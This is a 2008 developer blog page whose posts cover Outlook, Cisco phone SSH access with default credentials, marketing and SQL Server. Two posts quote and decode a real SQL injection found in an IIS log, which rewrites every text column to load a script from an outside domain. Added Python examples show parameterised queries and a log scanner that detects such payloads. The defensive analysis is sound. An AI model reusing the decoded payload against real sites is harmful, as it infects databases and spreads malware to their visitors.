Tim

Footprints in the snow of a warped mind


© 2008 Tim Gaunt.


 Friday, May 30, 2008

Can't launch Outlook when switching to Exchange from POP3

Friday, May 30, 2008 8:14:36 PM (GMT Standard Time, UTC+00:00)

I've had an irritating issue for the past week or so. I used to use POP3 in Outlook; however, the other day I switched to the internal Exchange server and got stuck in an eternal loop saying that Exchange needed to connect to the server to synchronise the offline files and folders - but you couldn't do that until the files were transferred.

The message looked something like this:

The set of folders cannot be opened. You must connect to Microsoft Exchange with the current profile before you can synchronise your folders with your offline folder file.

Took me a while but the fix was to remove the profile and set up the Exchange inbox first:

  1. Click Start, and then click Control Panel.
  2. Click Switch to Classic View, and then double-click Mail.
  3. In the Mail Setup dialog box, click Show Profiles.
  4. On the General tab, click Prompt for a profile to be used, and then click Add.
  5. In the Profile Name box, type a descriptive name for the new e-mail profile, and then click OK.
  6. In the E-mail Accounts dialog box, click Add a new e-mail account, and then click Next.
  7. Click the appropriate server type for your new e-mail account, and then click Next.
  8. Type your account information in the required boxes, and then click Next.
  9. Click Finish, and then click OK.
 Thursday, May 29, 2008

A seriously elegant SQL Injection -how it was sorted

Thursday, May 29, 2008 2:32:33 PM (GMT Standard Time, UTC+00:00)

Doug Setzer posted this comment in response to my recent "A seriously elegant SQL Injection" post and I thought it may be of interest to others so have promoted it to a post...


Well, I'll step up and say that I am the "mate" who had this done.  Tim's right - *always* sanitize your inputs.  In my defence, this was a site that I inherited from a previous contractor.  I'm not entirely absent of blame, I still should have done a security sweep through the code.

I'd like to document the steps that I went through once this was identified to try and avoid this kind of thing in the future.

  1. Edit every web page that executes a query to sanitize any parameters that are passed in.  Since the site was classic ASP, I used my "SQLStringFieldValue" function:
    www.27seconds.com/kb/article_view.aspx?id=50
  2. Modify the DB user account that is used to have *read only* access to the database
  3. Modify the pages that DO write to the database to have *read/write* access to the specific tables that are being changed.  This limits the number of places that SQL Injection can occur to a smaller set than was previously possible.  I still sanitize all of my input, but I'm extra spastic in these database calls.
  4. Add database auditing (triggers writing to mirror tables with audit event indicator & date/time) to see when data changes occur.  This is still problematic with the pages that have "write" permissions to the tables, but again- that footprint is much smaller.

My future plans are to move to a view/stored procedure based architecture.  I can then limit write permissions to just the stored procedures and read permissions to just the views.  My grand gusto plans are to move to using command objects & parameters, but I'd sooner re-write the entire site.

Although Doug's attack wasn't the same nihaorr1.com attack that's going around atm, it was similar, so I would imagine others will find this useful.

It still amazes me how many developers still fail to sanitise strings, only last week I came across another site (in PHP) that was allowing simple SQL injections to be used to log into their administration system. It was down to a problem with the sanitization string, but why not at least check your site before it goes live? It takes 2 minutes and even less to fix...

For those of you who need a few pointers, there's a good discussion or two about sanitising strings on the 4 Guys From Rolla site.
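An added example (not Doug's or Tim's code): the request in the IIS log extract went in through a numeric parameter (`newsID=37;...`), where no quote is needed, so quote-escaping leaves the input unchanged while integer validation plus a bound parameter rejects it. SQLite stands in for SQL Server here, and the table, data and function names are hypothetical.

```python
import re
import sqlite3

def escape_quotes(value):
    """Quote-doubling, the classic string 'sanitiser' (hypothetical helper)."""
    return value.replace("'", "''")

def news_concat(db, news_id):
    # Vulnerable: the value is spliced into a numeric context, so a
    # tampered value needs no quote and escape_quotes() changes nothing.
    sql = ("SELECT title FROM news WHERE published = 1 AND id = "
           + escape_quotes(news_id))
    return [row[0] for row in db.execute(sql)]

def news_bound(db, news_id):
    # Hardened: reject anything that is not a plain integer, then bind it.
    if not re.fullmatch(r"[0-9]{1,9}", news_id):
        raise ValueError("newsID must be an integer")
    sql = "SELECT title FROM news WHERE published = 1 AND id = ?"
    return [row[0] for row in db.execute(sql, (int(news_id),))]

def make_db():
    # Constructed sample data, in-memory only.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news "
               "(id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)",
                   [(37, "Launch day", 1), (38, "Unreleased draft", 0)])
    return db

def demo():
    db = make_db()
    tampered = "37 OR 1=1"  # constructed input: no quotes, nothing to escape
    leaked = news_concat(db, tampered)
    try:
        news_bound(db, tampered)
        rejected = False
    except ValueError:
        rejected = True
    return news_concat(db, "37"), leaked, news_bound(db, "37"), rejected

if __name__ == "__main__":
    print(demo())
```
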

 Wednesday, May 28, 2008

A seriously elegant SQL Injection

Wednesday, May 28, 2008 4:46:49 PM (GMT Standard Time, UTC+00:00)

Having been subject to a recent hack myself I can sympathise with one of my mates who had a SQL injection attack succeed on one of his sites earlier today. Admittedly mine was due to poor internal maintenance whereas this is almost a piece of art...

This is an extract from the IIS log file:

2008-05-20 21:21:28 W3SVC1 xxx.xxx.xxx.xxx POST /news_detail.asp newsID=37;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST([…] Mozilla/3.0+(compatible;+Indy+Library) - www.domain.com 200 0 0

This works out to:

DECLARE @T varchar(255), @C varchar(255) 
DECLARE Table_Cursor
CURSOR FOR 
select
    a.name,b.name 
from
    sysobjects a,syscolumns b 
where 
    a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 

OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0)

    BEGIN
        exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://hackersscriptdomain.cn/a.js></script>''')
        FETCH NEXT FROM  Table_Cursor INTO @T,@C 
    END 
CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

Very nice :) (though I can't condone hacking -no matter how elegant it is!)

p.s. The moral of the story is: always sanitise your strings - it's easy!
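An added example, not part of the original post: a log-triage helper that flags IIS lines carrying the DECLARE / CAST(0x...) pattern shown above and decodes the hex literal so the hidden SQL can be read. The field order is assumed to match the extract in the post, and the sample lines (including the `EXEC(@S)` tail and the harmless `SELECT 1` payload) are constructed.

```python
import re
from urllib.parse import unquote

# Hex literal passed to CAST(... AS [N]VARCHAR), as in the logged request.
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9a-f]+)\s+AS\s+(N?)VARCHAR", re.I)

def decode_cast_payloads(query):
    """Return the SQL text hidden in CAST(0x... AS [N]VARCHAR) literals."""
    found = []
    for hexdata, wide in CAST_HEX.findall(unquote(query)):
        if len(hexdata) % 2:          # odd length: truncated in the log
            continue
        raw = bytes.fromhex(hexdata)
        # NVARCHAR data is UTF-16LE; plain VARCHAR is single-byte.
        codec = "utf-16-le" if wide else "latin-1"
        found.append(raw.decode(codec, errors="replace"))
    return found

def scan_iis_line(line):
    """Flag a log line whose query string DECLAREs, CASTs hex and EXECs it."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 7:
        return None
    # Assumed field order, matching the extract in the post:
    # date time sitename ip method uri-stem uri-query ...
    query = fields[6]
    text = unquote(query).upper()
    payloads = decode_cast_payloads(query)
    if payloads and "DECLARE" in text and "EXEC" in text:
        return {"when": fields[0] + " " + fields[1],
                "page": fields[5], "sql": payloads}
    return None

# Constructed sample lines; the encoded statement is a harmless SELECT 1.
_HEX = "SELECT 1".encode("utf-16-le").hex().upper()
SAMPLE_HIT = ("2008-05-20 21:21:28 W3SVC1 192.0.2.10 POST /news_detail.asp "
              "newsID=37;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + _HEX +
              "%20AS%20NVARCHAR(4000));EXEC(@S); 80 - 198.51.100.7 "
              "Mozilla/3.0+(compatible;+Indy+Library) - www.domain.com 200 0 0")
SAMPLE_CLEAN = ("2008-05-20 21:20:01 W3SVC1 192.0.2.10 GET /news_detail.asp "
                "newsID=37 80 - 198.51.100.8 Mozilla/4.0 - www.domain.com 200 0 0")

if __name__ == "__main__":
    for entry in (SAMPLE_HIT, SAMPLE_CLEAN):
        print(scan_iis_line(entry))
```
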

Tags: Internet | SQL Server | Web Development
 Tuesday, May 27, 2008

SSH to the Cisco 7970G and set the date/time

Tuesday, May 27, 2008 9:20:21 PM (GMT Standard Time, UTC+00:00)

As everything so far with getting the Cisco 7970G to work on a SIP provider has been a nightmare, I thought I would share a few of my experiences. Sometimes it's the little things that make the biggest difference so this is how you correct the date and time!

Setting the Cisco 7970G's time is actually pretty simple:

  1. Download putty.exe and puttygen.exe from the putty download page
  2. Generate a key using puttygen.exe
  3. Update the "Key Comment" value to default@cisco
  4. Save the public key in a text file called authorized_keys and save it in your TFTP file folder
  5. Save the private key in your TFTP file folder
  6. Run putty.exe
  7. Enter your phone's IP in the "Host Name" box
  8. Go to Connection --> SSH --> Auth and click the "Browse" button and select your private key file (in your TFTP folder)
  9. Go to Connection --> Data and enter default under the "Auto-login username"
  10. (Optional) Save the settings in case you want to login again
  11. Click "Open" at the bottom of putty.exe to start the session
  12. Login using the username default and password user
  13. At the command prompt, type: /bin/date yyyyMMddhhmm (replacing the letters for the respective values)

Depending on which firmware version your phone is running, the date/time might need to be in CST. If you're like me and in GMT, this time website is pretty useful to keep in touch with things time wise.

When I moved the phone to 8.3.4 SR1 I found that the phone was (finally) pulling through the date/time setting correctly so I didn't need to use CST anymore. I've also set the NTP values which should automatically set the date/time which seems to be working on my phones but I've heard reports that it's not on others...

Tags: Cisco | 7970G
 Friday, May 23, 2008

The Site Doctor stressballs have arrived!

Friday, May 23, 2008 2:24:53 PM (GMT Standard Time, UTC+00:00)

Exciting times as all our hard work is finally coming to fruition - our branded stressballs have arrived and they look AWESOME! I really couldn't have hoped for a better looking outcome if I had tried, they're unbelievably cool (that or I'm unbelievably sad!) but take a look for yourself and see what you think! (You'll have to excuse the photography)

They were delivered in a massive box - I don't think I've seen so many pills before! All exciting...

 Tuesday, May 20, 2008

Taking the stress out of web design with The Site Doctor's new marketing "gimmick"

Tuesday, May 20, 2008 6:08:54 AM (GMT Standard Time, UTC+00:00)

So the logo and new website were complete, next we needed a marketing gimmick and a way to promote our services. We already had an idea of how we were going to promote ourselves but we needed a way of making it stand out.

We needed something that fitted with our new pill shaped logo but what? A label on some wine? Coloured TicTacs? Pens, Badges, Stickers...? They'd all been done before 101 times and we wanted to be different.

After banging heads together for a while it struck me, the perfect "gimmick" to go with our new brand identity had been around for years - in fact I got the inspiration from my mum who was a GP in Plymouth for many years. As a kid, I remember when she came home after a medical convention with hundreds of freebies including pens, post-its and calculators, but the one that got me thinking was the stressballs. She used to get pill shaped stress balls... What could be more perfect I ask you?

It sounds silly but getting a Red and White coloured stressball wasn't easy, I called around tens if not hundreds of suppliers, all of whom were able to supply us with Orange/White or Blue/White or All White stressballs but Red/White would take weeks to manufacture. The problem it turns out is that nearly all stressballs are made in China and there is only a single UK importer who all agents buy off. That combined with the Chinese new year made lead times grow exponentially.

Thanks to the wonderful power of Google, we did manage to find a supplier (in the UK no less) that was able to custom print the stressballs so watch this space for the outcome!
 Saturday, May 17, 2008

Has the apprentice been nailed to the floor?

Saturday, May 17, 2008 4:55:43 PM (GMT Standard Time, UTC+00:00)

I've watched pretty much every series of The Apprentice (the UK version with Sir Alan Sugar) and to an extent have enjoyed them all. I've got a horrible feeling that The Apprentice is going down the same route that Dragons Den and Big Brother seemed to take - that is getting contestants that are more interested in controversy and fame than anything else.

What I don't like about this current series is that there doesn't seem to be any form of camaraderie among the contestants, all of whom seem to be overly cut-throat and self-absorbed, this is of course to be expected in any competition but at times it's a little OTT.

I can't remember which episode it was but recently I was amazed that ?Claire refused to help the project manager with the pitch. Ok I completely agree that he should have asked her to do it in the first place but that could easily be put down to big headedness or stubbornness, surely she wants the team to have the best chance at winning?

What's worse is that seems to be playing the TV game not the business game, not firing clearly incompetent candidates and instead keeping them in and teaming them up with their nemesis. That was clear from almost the first episode which IMNSHO detracts massively from what the show is about.

Putting the rivalry aside for a moment, what's even more concerning is the quality of the candidates. I know a few people have blogged about how stupid some of them are and mocked how they're surely not Britain's best business minds (ignoring the fact that if they were Britain's best then why on earth are they going for a job only paying £100k) but come on! I'm not the sharpest tool in the toolbox but even I know that sending cards to "save the environment" is a ludicrous idea and don't even get me started on getting some guy down the market to "bless" a chicken...

Personally, I feel that Sir Alan (who appears to have become the government's entrepreneur advisor) is setting an extremely bad example for how to do business (and I've felt that from previous episodes where he criticises the losing team for not blagging something for free - ok you can do it a couple of times, but blagging won't really create a sustainable business). Sadly, this mix of candidates really doesn't do anything to improve that opinion, it'll be interesting to see how things pan out...

Tags: Business
 Wednesday, May 14, 2008

Native client cannot be found while installing SQL Server 64

Wednesday, May 14, 2008 8:03:44 PM (GMT Standard Time, UTC+00:00)

We're having fun and games with the new internal dev server. We've gone for Windows Server 2008 x64 for a laugh and today was a corker: while trying to install SQL Server 2005 x64 onto the box we repeatedly got an error along the lines of "native client cannot be found sqlncli_x64.msi".

Searching around the install DVD/files didn't reveal anything useful. It turns out (after a little Googling) that Microsoft install the wrong version of the SQL Server Native client tools as part of the prerequisites - instead of the 64bit version you'd expect, they go and install the 32bit which then makes the rest of the installer complain...

Classic! Anyway, thanks to Eric Falsken for the heads up on that error...